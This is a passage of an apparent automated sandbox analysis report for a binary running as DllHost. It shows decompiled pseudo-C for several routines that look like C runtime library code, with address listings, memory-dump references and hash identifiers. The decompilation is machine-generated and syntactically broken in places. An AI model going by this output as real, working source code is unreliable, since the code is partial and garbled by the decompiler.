				goto 0x191b9119;
				_t147 =  >=  ? _v48 : _t146;
				_t154 = _v32 - _v72 + ( >=  ? _v48 : _t146);
				if (_t154 <= 0) goto 0x191b910e;
				_t155 = _t154 - 1;
				E00007FF77FF7191D9DC4( *((char*)(_t155 + _v72)),  >=  ? _v48 : _t146, _t155,  *((intOrPtr*)(_t191 + 0x80)));
				if (_t155 <= 0) goto 0x191b910e;
				goto 0x191b90f0;
				goto 0x191b9119;
				_t187 = _v24;
				if (_t187 - 0x10 < 0) goto 0x191b9150;
				if (_t187 + 1 - 0x1000 < 0) goto 0x191b914b;
				if (_v48 -  *((intOrPtr*)(_v48 - 8)) + 0xfffffff8 - 0x1f > 0) goto 0x191b9173;
				0x191d23d0();
				return E00007FF77FF7191D23B0(0xffffffff,  *((char*)(_t155 + _v72)), _v16 ^ _t194 - 0x00000080);
			}









































                                                                                                                                                              0x7ff7191b8ed0
                                                                                                                                                              0x7ff7191b8ed0
                                                                                                                                                              0x7ff7191b8ed5
                                                                                                                                                              0x7ff7191b8ee5
                                                                                                                                                              0x7ff7191b8eef
                                                                                                                                                              0x7ff7191b8ef3
                                                                                                                                                              0x7ff7191b8efa
                                                                                                                                                              0x7ff7191b8f00
                                                                                                                                                              0x7ff7191b8f02
                                                                                                                                                              0x7ff7191b8f06
                                                                                                                                                              0x7ff7191b8f10
                                                                                                                                                              0x7ff7191b8f16
                                                                                                                                                              0x7ff7191b8f23
                                                                                                                                                              0x7ff7191b8f29
                                                                                                                                                              0x7ff7191b8f36
                                                                                                                                                              0x7ff7191b8f3d
                                                                                                                                                              0x7ff7191b8f42
                                                                                                                                                              0x7ff7191b8f4d
                                                                                                                                                              0x7ff7191b8f56
                                                                                                                                                              0x7ff7191b8f5d
                                                                                                                                                              0x7ff7191b8f64
                                                                                                                                                              0x7ff7191b8f69
                                                                                                                                                              0x7ff7191b8f6d
                                                                                                                                                              0x7ff7191b8f7b
                                                                                                                                                              0x7ff7191b8f7d
                                                                                                                                                              0x7ff7191b8f8a
                                                                                                                                                              0x7ff7191b8f93
                                                                                                                                                              0x7ff7191b8f9a
                                                                                                                                                              0x7ff7191b8f9e
                                                                                                                                                              0x7ff7191b8fa2
                                                                                                                                                              0x7ff7191b8faa
                                                                                                                                                              0x7ff7191b8fad
                                                                                                                                                              0x7ff7191b8fb5
                                                                                                                                                              0x7ff7191b8fb8
                                                                                                                                                              0x7ff7191b8fbe
                                                                                                                                                              0x7ff7191b8fc9
                                                                                                                                                              0x7ff7191b8fcf
                                                                                                                                                              0x7ff7191b8fdb
                                                                                                                                                              0x7ff7191b8fe0
                                                                                                                                                              0x7ff7191b8fe4
                                                                                                                                                              0x7ff7191b8fe9
                                                                                                                                                              0x7ff7191b8feb
                                                                                                                                                              0x7ff7191b8fef
                                                                                                                                                              0x7ff7191b8ffa
                                                                                                                                                              0x7ff7191b900c
                                                                                                                                                              0x7ff7191b9015
                                                                                                                                                              0x7ff7191b9021
                                                                                                                                                              0x7ff7191b902d
                                                                                                                                                              0x7ff7191b9036
                                                                                                                                                              0x7ff7191b903f
                                                                                                                                                              0x7ff7191b9048
                                                                                                                                                              0x7ff7191b9054
                                                                                                                                                              0x7ff7191b9057
                                                                                                                                                              0x7ff7191b9059
                                                                                                                                                              0x7ff7191b905e
                                                                                                                                                              0x7ff7191b906c
                                                                                                                                                              0x7ff7191b9073
                                                                                                                                                              0x7ff7191b907c
                                                                                                                                                              0x7ff7191b907f
                                                                                                                                                              0x7ff7191b9086
                                                                                                                                                              0x7ff7191b9093
                                                                                                                                                              0x7ff7191b9098
                                                                                                                                                              0x7ff7191b909b
                                                                                                                                                              0x7ff7191b90a6
                                                                                                                                                              0x7ff7191b90b2
                                                                                                                                                              0x7ff7191b90ba
                                                                                                                                                              0x7ff7191b90c5
                                                                                                                                                              0x7ff7191b90cd
                                                                                                                                                              0x7ff7191b90d4
                                                                                                                                                              0x7ff7191b90e4
                                                                                                                                                              0x7ff7191b90ea
                                                                                                                                                              0x7ff7191b90f0
                                                                                                                                                              0x7ff7191b90fe
                                                                                                                                                              0x7ff7191b9106
                                                                                                                                                              0x7ff7191b910c
                                                                                                                                                              0x7ff7191b9112
                                                                                                                                                              0x7ff7191b9119
                                                                                                                                                              0x7ff7191b9121
                                                                                                                                                              0x7ff7191b9134
                                                                                                                                                              0x7ff7191b9149
                                                                                                                                                              0x7ff7191b914b
                                                                                                                                                              0x7ff7191b9172

                                                                                                                                                              APIs
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.428644397.00007FF7191B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7191B0000, based on PE: true
                                                                                                                                                              • Associated: 00000000.00000002.428609123.00007FF7191B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.428983420.00007FF7191F9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.429183330.00007FF719219000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.429226699.00007FF71921C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff7191b0000_DllHost.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: _invalid_parameter_noinfo_noreturn
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 3668304517-0
                                                                                                                                                              • Opcode ID: e7bbe35f7d85425dd6dccc2eee4d70ef43307f74c954e07092d189adee22d5fe
                                                                                                                                                              • Instruction ID: 8477a427ea3ffe4c74e843632515cfed832dcbf49429b36e999c878196cf94f4
                                                                                                                                                              • Opcode Fuzzy Hash: e7bbe35f7d85425dd6dccc2eee4d70ef43307f74c954e07092d189adee22d5fe
                                                                                                                                                              • Instruction Fuzzy Hash: 8BA15C32B04E4189FB109F69E4402AC77B2FB48B68F945632DE1E53B85DF38D59AD310
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Function 00007FF7191B7BB0 Relevance: 1.7, APIs: 1, Instructions: 215COMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              C-Code - Quality: 53%
                                                                                                                                                              			E00007FF77FF7191B7BB0(intOrPtr __edx, long long __rbx, void* __rcx, long long __rdi, long long _a16, long long _a24) {
				void* _v8;
				signed int _v16;
				long long _v24;
				long long _v32;
				char _v48;
				char _v54;
				char _v56;
				char _v64;
				char _v72;
				long long _v80;
				long long _v88;
				long long _v96;
				long long _v104;
				void* _t89;
				void* _t91;
				void* _t115;
				signed long long _t129;
				intOrPtr* _t135;
				void* _t138;
				void* _t144;
				void* _t152;
				void* _t153;
				long long _t158;
				long long _t160;
				void* _t168;
				intOrPtr _t176;
				intOrPtr _t187;
				void* _t191;
				void* _t194;
				intOrPtr* _t197;
				long long* _t198;
				void* _t200;
				long long _t201;
				signed long long _t204;
				void* _t206;
				void* _t212;
				void* _t213;

				_t149 = __rbx;
				_a16 = __rbx;
				_a24 = __rdi;
				_t129 =  *0x192190a0; // 0x590452ce5669
				_v16 = _t129 ^ _t194 - 0x00000080;
				_t191 = __rcx;
				_t176 =  *((intOrPtr*)( *((intOrPtr*)(__rcx + 0x38))));
				if (_t176 == 0) goto 0x191b7c0f;
				_t197 =  *((intOrPtr*)(__rcx + 0x50));
				_t204 =  *_t197;
				if (_t176 - _t176 + _t204 * 2 >= 0) goto 0x191b7c0f;
				 *_t197 = _t204 - 1;
				 *((long long*)( *((intOrPtr*)(__rcx + 0x38)))) =  *((intOrPtr*)( *((intOrPtr*)(__rcx + 0x38)))) + 2;
				goto 0x191b7e34;
				if ( *((long long*)(__rcx + 0x80)) != 0) goto 0x191b7c23;
				goto 0x191b7e34;
				_t198 =  *((intOrPtr*)(__rcx + 0x18));
				if ( *_t198 != __rcx + 0x70) goto 0x191b7c54;
				_t158 =  *((intOrPtr*)(__rcx + 0x88));
				 *_t198 = _t158;
				 *((long long*)( *((intOrPtr*)(__rcx + 0x38)))) = _t158;
				_t135 =  *((intOrPtr*)(__rcx + 0x50));
				 *_t135 = __edx;
				if ( *((long long*)(__rcx + 0x68)) != 0) goto 0x191b7c7d;
				if (E00007FF77FF7191D9534(_t135, __rbx,  *((intOrPtr*)(__rcx + 0x80))) == 0xffff) goto 0x191b7e31;
				goto 0x191b7e31;
				_v48 = _t135;
				_v32 = _t135;
				_v24 = 0xf;
				_v48 = 0;
				_t89 = E00007FF77FF7191D9288(_t135, _t149,  *((intOrPtr*)(__rcx + 0x80))); // executed
				r8d = _t89;
				if (_t89 == 0xffffffff) goto 0x191b7df5;
				_t160 = _v32;
				if (_t160 - _v24 >= 0) goto 0x191b7cd0;
				_v32 = _t160 + 1;
				_t138 =  >=  ? _v48 :  &_v48;
				 *(_t138 + _t160) = r8b;
				 *((char*)(_t138 + _t160 + 1)) = 0;
				goto 0x191b7ce4;
				r9d = r8b & 0xffffffff;
				r8d = 0;
				E00007FF77FF7191BC910( &_v48, _v24, __rcx, _t212, _t213);
				_t183 =  >=  ? _v48 :  &_v48;
				_t206 = _v32 + ( >=  ? _v48 :  &_v48);
				_t200 =  >=  ? _v48 :  &_v48;
				_v80 =  &_v64;
				_v88 =  &_v54;
				_v96 =  &_v56;
				_v104 =  &_v72;
				_t91 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t191 + 0x68)))) + 0x30))();
				_t115 = _t91;
				if (_t115 == 0) goto 0x191b7d45;
				if (_t115 != 0) goto 0x191b7d9c;
				if (_v64 !=  &_v56) goto 0x191b7db4;
				_t142 =  >=  ? _v48 :  &_v48;
				_t208 = _v72 - ( >=  ? _v48 :  &_v48);
				_t201 = _v32;
				_t209 =  <  ? _t201 : _v72 - ( >=  ? _v48 :  &_v48);
				_t168 =  >=  ? _v48 :  &_v48;
				_t202 = _t201 - ( <  ? _t201 : _v72 - ( >=  ? _v48 :  &_v48));
				_v32 = _t201 - ( <  ? _t201 : _v72 - ( >=  ? _v48 :  &_v48));
				E00007FF77FF7191D4380();
				goto 0x191b7c92;
				if (_t91 - 1 != 2) goto 0x191b7df5;
				_t144 =  >=  ? _v48 :  &_v48;
				goto 0x191b7dfa;
				_t145 =  >=  ? _v48 : _t144;
				_t152 = _v32 - _v72 + ( >=  ? _v48 : _t144);
				if (_t152 <= 0) goto 0x191b7def;
				_t153 = _t152 - 1;
				E00007FF77FF7191D9DC4( *((char*)(_t153 + _v72)),  >=  ? _v48 : _t144, _t153,  *((intOrPtr*)(_t191 + 0x80)));
				if (_t153 <= 0) goto 0x191b7def;
				goto 0x191b7dd1;
				goto 0x191b7dfa;
				_t187 = _v24;
				if (_t187 - 0x10 < 0) goto 0x191b7e31;
				if (_t187 + 1 - 0x1000 < 0) goto 0x191b7e2c;
				if (_v48 -  *((intOrPtr*)(_v48 - 8)) + 0xfffffff8 - 0x1f > 0) goto 0x191b7e55;
				0x191d23d0();
				return E00007FF77FF7191D23B0(0xffff,  *((char*)(_t153 + _v72)), _v16 ^ _t194 - 0x00000080);
			}








































                                                                                                                                                              0x7ff7191b7bb0
                                                                                                                                                              0x7ff7191b7bb0
                                                                                                                                                              0x7ff7191b7bb5
                                                                                                                                                              0x7ff7191b7bc5
                                                                                                                                                              0x7ff7191b7bcf
                                                                                                                                                              0x7ff7191b7bd3
                                                                                                                                                              0x7ff7191b7bda
                                                                                                                                                              0x7ff7191b7be0
                                                                                                                                                              0x7ff7191b7be2
                                                                                                                                                              0x7ff7191b7be6
                                                                                                                                                              0x7ff7191b7bf0
                                                                                                                                                              0x7ff7191b7bf6
                                                                                                                                                              0x7ff7191b7c04
                                                                                                                                                              0x7ff7191b7c0a
                                                                                                                                                              0x7ff7191b7c17
                                                                                                                                                              0x7ff7191b7c1e
                                                                                                                                                              0x7ff7191b7c23
                                                                                                                                                              0x7ff7191b7c2e
                                                                                                                                                              0x7ff7191b7c37
                                                                                                                                                              0x7ff7191b7c3e
                                                                                                                                                              0x7ff7191b7c45
                                                                                                                                                              0x7ff7191b7c4e
                                                                                                                                                              0x7ff7191b7c52
                                                                                                                                                              0x7ff7191b7c60
                                                                                                                                                              0x7ff7191b7c6f
                                                                                                                                                              0x7ff7191b7c78
                                                                                                                                                              0x7ff7191b7c7f
                                                                                                                                                              0x7ff7191b7c83
                                                                                                                                                              0x7ff7191b7c87
                                                                                                                                                              0x7ff7191b7c8f
                                                                                                                                                              0x7ff7191b7c92
                                                                                                                                                              0x7ff7191b7c9a
                                                                                                                                                              0x7ff7191b7c9d
                                                                                                                                                              0x7ff7191b7ca3
                                                                                                                                                              0x7ff7191b7cae
                                                                                                                                                              0x7ff7191b7cb4
                                                                                                                                                              0x7ff7191b7cc0
                                                                                                                                                              0x7ff7191b7cc5
                                                                                                                                                              0x7ff7191b7cc9
                                                                                                                                                              0x7ff7191b7cce
                                                                                                                                                              0x7ff7191b7cd0
                                                                                                                                                              0x7ff7191b7cd4
                                                                                                                                                              0x7ff7191b7cdf
                                                                                                                                                              0x7ff7191b7cf1
                                                                                                                                                              0x7ff7191b7cfa
                                                                                                                                                              0x7ff7191b7d06
                                                                                                                                                              0x7ff7191b7d12
                                                                                                                                                              0x7ff7191b7d1b
                                                                                                                                                              0x7ff7191b7d24
                                                                                                                                                              0x7ff7191b7d2d
                                                                                                                                                              0x7ff7191b7d39
                                                                                                                                                              0x7ff7191b7d3c
                                                                                                                                                              0x7ff7191b7d3e
                                                                                                                                                              0x7ff7191b7d43
                                                                                                                                                              0x7ff7191b7d51
                                                                                                                                                              0x7ff7191b7d58
                                                                                                                                                              0x7ff7191b7d61
                                                                                                                                                              0x7ff7191b7d64
                                                                                                                                                              0x7ff7191b7d6b
                                                                                                                                                              0x7ff7191b7d78
                                                                                                                                                              0x7ff7191b7d7d
                                                                                                                                                              0x7ff7191b7d80
                                                                                                                                                              0x7ff7191b7d8b
                                                                                                                                                              0x7ff7191b7d97
                                                                                                                                                              0x7ff7191b7d9f
                                                                                                                                                              0x7ff7191b7daa
                                                                                                                                                              0x7ff7191b7db2
                                                                                                                                                              0x7ff7191b7db9
                                                                                                                                                              0x7ff7191b7dc9
                                                                                                                                                              0x7ff7191b7dcf
                                                                                                                                                              0x7ff7191b7dd1
                                                                                                                                                              0x7ff7191b7ddf
                                                                                                                                                              0x7ff7191b7de7
                                                                                                                                                              0x7ff7191b7ded
                                                                                                                                                              0x7ff7191b7df3
                                                                                                                                                              0x7ff7191b7dfa
                                                                                                                                                              0x7ff7191b7e02
                                                                                                                                                              0x7ff7191b7e15
                                                                                                                                                              0x7ff7191b7e2a
                                                                                                                                                              0x7ff7191b7e2c
                                                                                                                                                              0x7ff7191b7e54

                                                                                                                                                              APIs
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.428644397.00007FF7191B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7191B0000, based on PE: true
                                                                                                                                                              • Associated: 00000000.00000002.428609123.00007FF7191B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.428983420.00007FF7191F9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.429183330.00007FF719219000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.429226699.00007FF71921C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff7191b0000_DllHost.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: _invalid_parameter_noinfo_noreturn
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 3668304517-0
                                                                                                                                                              • Opcode ID: d214cb9b175aa3e5c60bc0753a9a494e60eaae917e4a77c2333562574a631cde
                                                                                                                                                              • Instruction ID: 660bf5b0095cb6f4bfff0d0541fd2cdf03725a73f775b7c84d324d19982a8806
                                                                                                                                                              • Opcode Fuzzy Hash: d214cb9b175aa3e5c60bc0753a9a494e60eaae917e4a77c2333562574a631cde
                                                                                                                                                              • Instruction Fuzzy Hash: 18916D22B04E4189FB10DF65D0802BC77B2FB48BA8F985536DE5E53A88DF38D599D360
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Function 00007FF7191D9820 Relevance: 1.6, APIs: 1, Instructions: 133COMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              C-Code - Quality: 100%
                                                                                                                                                              			E00007FF77FF7191D9820(intOrPtr* __rax, long long __rbx, void* __rcx, void* __rdx, long long __rsi, long long __rbp, void* __r8, void* __r9, long long _a8, long long _a24, long long _a32) {

				_a8 = __rbx;
				_a24 = __rbp;
				_a32 = __rsi;
				if (__rdx == 0) goto 0x191d9867;
				if (__r8 == 0) goto 0x191d9867;
				if (__r9 != 0) goto 0x191d9886;
				E00007FF77FF7191DC854(__rax);
				 *__rax = 0x16;
				E00007FF77FF7191DA5D8();
				return 0;
			}



                                                                                                                                                              0x7ff7191d9820
                                                                                                                                                              0x7ff7191d9825
                                                                                                                                                              0x7ff7191d982a
                                                                                                                                                              0x7ff7191d984b
                                                                                                                                                              0x7ff7191d9850
                                                                                                                                                              0x7ff7191d9855
                                                                                                                                                              0x7ff7191d9857
                                                                                                                                                              0x7ff7191d985c
                                                                                                                                                              0x7ff7191d9862
                                                                                                                                                              0x7ff7191d9885

                                                                                                                                                              APIs
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.428644397.00007FF7191B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7191B0000, based on PE: true
                                                                                                                                                              • Associated: 00000000.00000002.428609123.00007FF7191B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.428983420.00007FF7191F9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.429183330.00007FF719219000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.429226699.00007FF71921C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff7191b0000_DllHost.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: _invalid_parameter_noinfo
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 3215553584-0
                                                                                                                                                              • Opcode ID: 9d7a477fe23112f494b72c6af38e4354a456fbf2936445a592086e829981dfa7
                                                                                                                                                              • Instruction ID: 65b3723673c37266579dfb1d07e31c88bcd7fbdaf204f7fded02648afa105d8f
                                                                                                                                                              • Opcode Fuzzy Hash: 9d7a477fe23112f494b72c6af38e4354a456fbf2936445a592086e829981dfa7
                                                                                                                                                              • Instruction Fuzzy Hash: C841C771B09A4545FA68AD266508139F2E3AF44FF8F884234ED5D477C9CE3CE48B9260
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Function 00007FF7191E72A0 Relevance: 1.6, APIs: 1, Instructions: 104COMMONLIBRARYCODE
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              C-Code - Quality: 66%
                                                                                                                                                              			E00007FF77FF7191E72A0(void* __ecx, signed int __esi, intOrPtr* __rax, long long __rbx, signed char** __rcx, long long __rdi, long long __rsi, long long _a8, long long _a16, long long _a24) {
				void* _t55;
				signed int _t56;
				void* _t73;
				void* _t77;
				signed int _t79;
				intOrPtr* _t96;
				signed char* _t98;
				signed char** _t116;
				void* _t123;

				_t96 = __rax;
				_a8 = __rbx;
				_a16 = __rsi;
				_a24 = __rdi;
				_t116 = __rcx;
				if (__rcx != 0) goto 0x191e72d2;
				E00007FF77FF7191DC854(__rax);
				 *__rax = 0x16;
				E00007FF77FF7191DA5D8();
				goto 0x191e73ef;
				if (( *(__rcx + 0x14) >> 0x0000000d & 0x00000001) == 0) goto 0x191e73ef;
				if (( *(__rcx + 0x14) >> 0x0000000c & 0x00000001) != 0) goto 0x191e73ef;
				if (( *(__rcx + 0x14) >> 0x00000001 & 0x00000001) == 0) goto 0x191e7301;
				asm("lock or dword [ecx+0x14], 0x10");
				goto 0x191e73ef;
				asm("lock or dword [ecx+0x14], 0x1");
				if (( *(__rcx + 0x14) & 0x000004c0) != 0) goto 0x191e7315;
				E00007FF77FF7191E7094(__rax, __rbx, __rcx);
				_t101 =  *((intOrPtr*)(__rcx + 8));
				 *((long long*)(__rcx)) =  *((intOrPtr*)(__rcx + 8));
				_t55 = E00007FF77FF7191E4FCC(__rax, __rcx);
				r8d =  *((intOrPtr*)(__rcx + 0x20));
				_t56 = E00007FF77FF7191E88F0(_t73, _t55, _t77,  *((intOrPtr*)(__rcx + 8)), _t101, __rcx, _t123); // executed
				_t116[2] = _t56;
				_t19 = _t96 + 1; // 0x1
				if (_t19 - 1 <= 0) goto 0x191e73dd;
				_t79 = __esi | 0xffffffff;
				if ((_t116[2] & 0x00000006) != 0) goto 0x191e73a8;
				if (E00007FF77FF7191E4FCC(_t96, _t116) == _t79) goto 0x191e7393;
				if (E00007FF77FF7191E4FCC(_t96, _t116) == 0xfffffffe) goto 0x191e7393;
				E00007FF77FF7191E4FCC(_t96, _t116);
				E00007FF77FF7191E4FCC(_t96, _t116);
				goto 0x191e739a;
				if (( *0x7FF719219308 & 0x00000082) != 0x82) goto 0x191e73a8;
				asm("lock or dword [edi+0x14], 0x20");
				if (_t116[4] != 0x200) goto 0x191e73cc;
				if ((_t116[2] >> 0x00000006 & 0x00000001) == 0) goto 0x191e73cc;
				if ((_t116[2] >> 0x00000008 & 0x00000001) != 0) goto 0x191e73cc;
				_t116[4] = 0x1000;
				_t116[2] =  &(_t116[2][_t79]);
				_t98 =  *_t116;
				 *_t116 =  &(_t98[1]);
				goto 0x191e73f2;
				asm("sbb eax, eax");
				asm("lock or [edi+0x14], eax");
				_t116[2] = _t116[2] & 0x00000000;
				return  *_t98 & 0x000000ff | 0xffffffff;
			}












                                                                                                                                                              0x7ff7191e72a0
                                                                                                                                                              0x7ff7191e72a0
                                                                                                                                                              0x7ff7191e72a5
                                                                                                                                                              0x7ff7191e72aa
                                                                                                                                                              0x7ff7191e72b5
                                                                                                                                                              0x7ff7191e72bb
                                                                                                                                                              0x7ff7191e72bd
                                                                                                                                                              0x7ff7191e72c2
                                                                                                                                                              0x7ff7191e72c8
                                                                                                                                                              0x7ff7191e72cd
                                                                                                                                                              0x7ff7191e72da
                                                                                                                                                              0x7ff7191e72e8
                                                                                                                                                              0x7ff7191e72f5
                                                                                                                                                              0x7ff7191e72f7
                                                                                                                                                              0x7ff7191e72fc
                                                                                                                                                              0x7ff7191e7301
                                                                                                                                                              0x7ff7191e730e
                                                                                                                                                              0x7ff7191e7310
                                                                                                                                                              0x7ff7191e7315
                                                                                                                                                              0x7ff7191e731c
                                                                                                                                                              0x7ff7191e731f
                                                                                                                                                              0x7ff7191e7324
                                                                                                                                                              0x7ff7191e732d
                                                                                                                                                              0x7ff7191e7332
                                                                                                                                                              0x7ff7191e7335
                                                                                                                                                              0x7ff7191e733b
                                                                                                                                                              0x7ff7191e7344
                                                                                                                                                              0x7ff7191e7349
                                                                                                                                                              0x7ff7191e7355
                                                                                                                                                              0x7ff7191e7362
                                                                                                                                                              0x7ff7191e7367
                                                                                                                                                              0x7ff7191e737d
                                                                                                                                                              0x7ff7191e7391
                                                                                                                                                              0x7ff7191e73a1
                                                                                                                                                              0x7ff7191e73a3
                                                                                                                                                              0x7ff7191e73af
                                                                                                                                                              0x7ff7191e73b9
                                                                                                                                                              0x7ff7191e73c3
                                                                                                                                                              0x7ff7191e73c5
                                                                                                                                                              0x7ff7191e73cc
                                                                                                                                                              0x7ff7191e73cf
                                                                                                                                                              0x7ff7191e73d8
                                                                                                                                                              0x7ff7191e73db
                                                                                                                                                              0x7ff7191e73df
                                                                                                                                                              0x7ff7191e73e7
                                                                                                                                                              0x7ff7191e73eb
                                                                                                                                                              0x7ff7191e7409

                                                                                                                                                              APIs
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.428644397.00007FF7191B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7191B0000, based on PE: true
                                                                                                                                                              • Associated: 00000000.00000002.428609123.00007FF7191B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.428983420.00007FF7191F9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.429183330.00007FF719219000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.429226699.00007FF71921C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff7191b0000_DllHost.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: _invalid_parameter_noinfo
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 3215553584-0
                                                                                                                                                              • Opcode ID: ce083e79ecf88197a998a97d8e683864580dc503782226a40ba212a36745c3d7
                                                                                                                                                              • Instruction ID: 29faf1608a9dba858ed7795d380b4e5b36e732b4521481905751645dc049e836
                                                                                                                                                              • Opcode Fuzzy Hash: ce083e79ecf88197a998a97d8e683864580dc503782226a40ba212a36745c3d7
                                                                                                                                                              • Instruction Fuzzy Hash: 2D41E732A18A4683FA5AAF18E64027C73B0FB44B68F840631DF4D576D1CF68E5A7D760
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Function 00007FF7191E88F0 Relevance: 1.6, APIs: 1, Instructions: 74COMMONLIBRARYCODE
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              C-Code - Quality: 86%
                                                                                                                                                              			E00007FF77FF7191E88F0(signed int __ebx, signed int __ecx, void* __edi, signed int __rbx, void* __rdx, signed int __rdi, signed int __r12, void* _a16, void* _a24, void* _a32) {
				void* _t44;
				void* _t47;
				signed int* _t52;
				signed int* _t54;
				signed int* _t56;
				signed int* _t65;
				void* _t68;
				signed long long _t73;
				void* _t75;
				void* _t77;
				signed long long _t79;

				_t44 = __edi;
				_t52 = _t65;
				_t52[4] = __rbx;
				_t52[6] = __rdi;
				_t52[8] = __r12;
				_t52[2] = __ecx;
				r14d = r8d;
				if (__edi != 0xfffffffe) goto 0x191e8932;
				E00007FF77FF7191DC834(_t52);
				 *_t52 =  *_t52 & 0x00000000;
				E00007FF77FF7191DC854(_t52);
				 *_t52 = 9;
				goto 0x191e89ec;
				if (__ecx < 0) goto 0x191e89d4;
				_t47 = _t44 -  *0x1921bb00; // 0x40
				if (_t47 >= 0) goto 0x191e89d4;
				_t79 = __ecx >> 6;
				_t73 = __ecx + __ecx * 8;
				_t54 =  *((intOrPtr*)(0x1921b700 + _t79 * 8));
				if (( *(_t54 + 0x38 + _t73 * 8) & 0x00000001) == 0) goto 0x191e89d4;
				if (r14d - 0x7fffffff <= 0) goto 0x191e8988;
				E00007FF77FF7191DC834(_t54);
				 *_t54 =  *_t54 & 0x00000000;
				E00007FF77FF7191DC854(_t54);
				 *_t54 = 0x16;
				goto 0x191e89e7;
				E00007FF77FF7191EAB1C();
				_t56 =  *((intOrPtr*)(0x1921b700 + _t79 * 8));
				if (( *(0x1921b700 + 0x38 + _t73 * 8) & 0x00000001) != 0) goto 0x191e89ba;
				E00007FF77FF7191DC854(_t56);
				 *0x1921b700 = 9;
				E00007FF77FF7191DC834(_t56);
				 *0x1921b700 =  *0x1921b700 & 0x00000000;
				goto 0x191e89c9;
				r8d = r14d;
				E00007FF77FF7191E8A0C(__ebx | 0xffffffff, __edi, _t56, __rbx, __rdx, _t68, _t77, _t75); // executed
				E00007FF77FF7191EAC04();
				goto 0x191e89ef;
				E00007FF77FF7191DC834(_t56);
				 *0x1921b700 =  *0x1921b700 & 0x00000000;
				E00007FF77FF7191DC854(_t56);
				 *_t56 = 9;
				return E00007FF77FF7191DA5D8() | 0xffffffff;
			}














                                                                                                                                                              0x7ff7191e88f0
                                                                                                                                                              0x7ff7191e88f0
                                                                                                                                                              0x7ff7191e88f3
                                                                                                                                                              0x7ff7191e88f7
                                                                                                                                                              0x7ff7191e88fb
                                                                                                                                                              0x7ff7191e88ff
                                                                                                                                                              0x7ff7191e890c
                                                                                                                                                              0x7ff7191e8918
                                                                                                                                                              0x7ff7191e891a
                                                                                                                                                              0x7ff7191e891f
                                                                                                                                                              0x7ff7191e8922
                                                                                                                                                              0x7ff7191e8927
                                                                                                                                                              0x7ff7191e892d
                                                                                                                                                              0x7ff7191e8934
                                                                                                                                                              0x7ff7191e893a
                                                                                                                                                              0x7ff7191e8940
                                                                                                                                                              0x7ff7191e894c
                                                                                                                                                              0x7ff7191e895a
                                                                                                                                                              0x7ff7191e895e
                                                                                                                                                              0x7ff7191e8968
                                                                                                                                                              0x7ff7191e8971
                                                                                                                                                              0x7ff7191e8973
                                                                                                                                                              0x7ff7191e8978
                                                                                                                                                              0x7ff7191e897b
                                                                                                                                                              0x7ff7191e8980
                                                                                                                                                              0x7ff7191e8986
                                                                                                                                                              0x7ff7191e898a
                                                                                                                                                              0x7ff7191e8999
                                                                                                                                                              0x7ff7191e89a3
                                                                                                                                                              0x7ff7191e89a5
                                                                                                                                                              0x7ff7191e89aa
                                                                                                                                                              0x7ff7191e89b0
                                                                                                                                                              0x7ff7191e89b5
                                                                                                                                                              0x7ff7191e89b8
                                                                                                                                                              0x7ff7191e89ba
